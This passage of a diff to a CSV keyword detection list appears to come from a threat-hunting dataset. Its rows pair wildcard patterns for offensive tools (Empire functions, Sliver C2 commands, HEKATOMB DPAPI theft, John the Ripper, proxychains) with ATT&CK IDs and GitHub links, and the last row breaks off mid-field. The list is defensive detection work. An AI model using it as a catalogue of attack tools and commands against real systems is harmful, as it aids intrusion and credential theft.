T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*ProcessRDPFile*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*ProcessRDPLocal*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*ProcessSuperPuTTYFile*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Process-TaskingPackets*","offensive_tool_keyword","empire","empire function name of agent.ps1.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1059","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*ProcessThoroughLocal*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*ProcessThoroughRemote*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Processus-Thief/HEKATOMB*","offensive_tool_keyword","HEKATOMB","Hekatomb is a python script that connects to LDAP directory to retrieve all computers and users informations. Then it will download all DPAPI blob of all users from all computers and uses Domain backup keys to decrypt them","T1087.002 - T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","AD Enumeration","https://github.com/Processus-Thief/HEKATOMB","1","1","N/A","N/A","4","372","40","2023-02-08T16:00:47Z","2022-09-09T15:07:15Z" -"*ProcessWinSCPLocal*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*ProcessWinSCPLocal*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*produkey.zip*","offensive_tool_keyword","produkey","ProduKey is a small utility that displays the ProductID and the CD-Key of Microsoft Office (Microsoft Office 2003. Microsoft Office 2007). Windows (Including Windows 8/7/Vista). Exchange Server. and SQL Server installed on your computer. You can view this information for your current running operating system. or for another operating system/computer - by using command-line options. This utility can be useful if you lost the product key of your Windows/Office. and you want to reinstall it on your computer.","T1003.001 - T1003.002 - T1012 - T1057 - T1518","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/product_cd_key_viewer.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*produkey_setup.exe*","offensive_tool_keyword","produkey","ProduKey is a small utility that displays the ProductID and the CD-Key of Microsoft Office (Microsoft Office 2003. Microsoft Office 2007). Windows (Including Windows 8/7/Vista). Exchange Server. and SQL Server installed on your computer. You can view this information for your current running operating system. or for another operating system/computer - by using command-line options. This utility can be useful if you lost the product key of your Windows/Office. and you want to reinstall it on your computer.","T1003.001 - T1003.002 - T1012 - T1057 - T1518","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/product_cd_key_viewer.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*produkey-x64.zip*","offensive_tool_keyword","produkey","ProduKey is a small utility that displays the ProductID and the CD-Key of Microsoft Office (Microsoft Office 2003. Microsoft Office 2007). Windows (Including Windows 8/7/Vista). Exchange Server. and SQL Server installed on your computer. You can view this information for your current running operating system. or for another operating system/computer - by using command-line options. This utility can be useful if you lost the product key of your Windows/Office. and you want to reinstall it on your computer.","T1003.001 - T1003.002 - T1012 - T1057 - T1518","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/product_cd_key_viewer.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*profiles generate --save *","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" -"*profiles new beacon *","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" -"*profiles new --mtls *","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" +"*profiles generate --save *","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*profiles new beacon *","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*profiles new --mtls *","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" "*ProgIDsUACBypass.*","offensive_tool_keyword","cobaltstrike","Erebus CobaltStrike post penetration testing plugin","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/DeEpinGh0st/Erebus","1","1","N/A","10","10","1356","214","2021-10-28T06:20:51Z","2019-09-26T09:32:00Z" "*program/replay.pl*","offensive_tool_keyword","nikto","Nikto web server scanner","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/sullo/nikto","1","1","N/A","N/A","10","7136","1096","2023-09-18T14:44:28Z","2012-11-24T04:24:29Z" -"*projectdiscovery/interactsh*","offensive_tool_keyword","interactsh","Interactsh is an open-source tool for detecting out-of-band interactions. It is a tool designed to detect vulnerabilities that cause external interactions but abused by attackers as C12","T1566.002 - T1566.001 - T1071 - T1102","TA0011 - TA0001","N/A","N/A","C2","https://github.com/projectdiscovery/interactsh","1","1","FP risk - legitimate service abused by attackers - move to admintools ?","10","10","2675","317","2023-10-02T08:20:04Z","2021-01-29T14:31:51Z" -"*prosody2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*projectdiscovery/interactsh*","offensive_tool_keyword","interactsh","Interactsh is an open-source tool for detecting out-of-band interactions. It is a tool designed to detect vulnerabilities that cause external interactions but abused by attackers as C12","T1566.002 - T1566.001 - T1071 - T1102","TA0011 - TA0001","N/A","N/A","C2","https://github.com/projectdiscovery/interactsh","1","1","FP risk - legitimate service abused by attackers - move to admintools ?","10","10","2677","317","2023-10-02T08:20:04Z","2021-01-29T14:31:51Z" +"*prosody2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*prowler gcp --credentials-file path*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*Proxmark*","offensive_tool_keyword","Proxmark","The proxmark3 is a powerful general purpose RFID tool. the size of a deck of cards. designed to snoop. listen and emulate everything from Low Frequency (125kHz) to High Frequency (13.56MHz) tags.","T1210 - T1561 - T1336 - T1335","TA0002 - TA0011 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/Proxmark/proxmark3","1","1","N/A","N/A","10","2872","891","2021-03-30T06:59:59Z","2014-03-16T23:36:31Z" "*proxmark3 -p /dev/ttyACM0*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*Proxy bypass enabled for Neo4j connection*","offensive_tool_keyword","autobloody","Tool to automatically exploit Active Directory privilege escalation paths shown by BloodHound","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/CravateRouge/autobloody","1","0","N/A","10","4","330","38","2023-09-01T06:41:34Z","2022-09-07T13:34:30Z" +"*Proxy bypass enabled for Neo4j connection*","offensive_tool_keyword","autobloody","Tool to automatically exploit Active Directory privilege escalation paths shown by BloodHound","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/CravateRouge/autobloody","1","0","N/A","10","4","330","38","2023-10-04T14:40:59Z","2022-09-07T13:34:30Z" "*Proxy Shellcode Handler*","offensive_tool_keyword","cobaltstrike","Project to enumerate proxy configurations and generate shellcode from CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EncodeGroup/AggressiveProxy","1","0","N/A","10","10","139","26","2020-11-04T16:08:11Z","2020-11-04T12:53:00Z" "*proxy.py --dns * --dns_port * --clients*","offensive_tool_keyword","ThunderDNS","This tool can forward TCP traffic over DNS protocol","T1095 - T1071.004","TA0011 - TA0003","N/A","N/A","C2","https://github.com/fbkcs/ThunderDNS","1","0","N/A","10","10","405","60","2019-12-24T12:41:17Z","2018-12-04T15:18:47Z" -"*proxy_bypass.py*","offensive_tool_keyword","autobloody","Tool to automatically exploit Active Directory privilege escalation paths shown by BloodHound","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/CravateRouge/autobloody","1","1","N/A","10","4","330","38","2023-09-01T06:41:34Z","2022-09-07T13:34:30Z" -"*proxy_cmd_for_exec_by_sibling*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3252","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" -"*proxy_linux_amd64*","offensive_tool_keyword","Modlishka ","Modlishka is a powerful and flexible HTTP reverse proxy. It implements an entirely new and interesting approach of handling browser-based HTTP traffic flow. which allows to transparently proxy multi-domain destination traffic. both TLS and non-TLS. over a single domain. without a requirement of installing any additional certificate on the client.","T1090.001 - T1071.001 - T1556.001 - T1204.001 - T1568.002","TA0011 - TA0001 - TA0002 - TA0005 - TA0040","N/A","N/A","Network Exploitation Tools","https://github.com/drk1wi/Modlishka","1","1","N/A","5","10","4434","854","2023-04-10T07:30:13Z","2018-12-19T15:59:54Z" +"*proxy_bypass.py*","offensive_tool_keyword","autobloody","Tool to automatically exploit Active Directory privilege escalation paths shown by BloodHound","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/CravateRouge/autobloody","1","1","N/A","10","4","330","38","2023-10-04T14:40:59Z","2022-09-07T13:34:30Z" +"*proxy_cmd_for_exec_by_sibling*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3255","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" +"*proxy_linux_amd64*","offensive_tool_keyword","Modlishka ","Modlishka is a powerful and flexible HTTP reverse proxy. It implements an entirely new and interesting approach of handling browser-based HTTP traffic flow. which allows to transparently proxy multi-domain destination traffic. both TLS and non-TLS. over a single domain. without a requirement of installing any additional certificate on the client.","T1090.001 - T1071.001 - T1556.001 - T1204.001 - T1568.002","TA0011 - TA0001 - TA0002 - TA0005 - TA0040","N/A","N/A","Network Exploitation Tools","https://github.com/drk1wi/Modlishka","1","1","N/A","5","10","4435","854","2023-04-10T07:30:13Z","2018-12-19T15:59:54Z" "*proxychains -*","offensive_tool_keyword","proxychains","proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy","T1090.004 - T1090.003 - T1027","TA0001 - TA0006 - TA0040","N/A","N/A","Exploitation tools","https://github.com/haad/proxychains","1","0","N/A","N/A","10","5489","586","2023-04-05T10:32:16Z","2011-02-25T12:27:05Z" "*proxychains atexec.py*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - 